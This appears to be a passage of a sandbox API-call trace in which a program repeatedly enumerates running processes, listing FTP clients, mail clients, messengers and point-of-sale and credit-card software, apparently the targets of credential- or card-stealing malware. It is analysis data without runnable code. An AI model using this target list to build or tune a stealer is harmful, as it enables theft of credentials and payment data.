pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.265] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.268] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.271] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0151.273] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0151.275] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0151.277] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0151.279] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0151.281] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0151.284] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0151.286] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0151.288] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0151.290] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0151.292] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0151.294] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0151.296] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0151.302] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0151.305] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0151.307] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0151.309] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0151.311] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0151.314] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0151.316] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0151.318] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0151.320] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0151.323] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0151.325] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0151.328] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0151.331] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0151.333] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0151.334] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0151.336] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0151.337] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0151.339] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0151.341] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0151.342] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0151.344] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0151.345] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0151.347] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0151.349] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0151.350] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0151.352] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0151.353] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0151.355] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0151.356] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0151.358] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0151.359] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0151.361] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0151.362] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0151.364] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0151.365] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0151.367] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0151.368] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0151.370] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0151.371] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0151.373] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0151.374] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0151.376] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0151.377] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0151.379] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0151.380] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0151.381] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0151.383] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0151.384] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0151.386] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0151.387] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0151.388] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0151.390] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0151.391] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0151.393] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0151.394] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0151.395] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.397] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0151.398] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0151.399] Process32Next (in: hSnapshot=0x1a28, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0151.400] CloseHandle (hObject=0x1a28) returned 1 [0151.401] Sleep (dwMilliseconds=0x64) [0151.700] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bf0 [0151.714] Process32First (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.716] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.718] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.720] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.722] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.724] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.727] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.729] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.731] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.733] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, 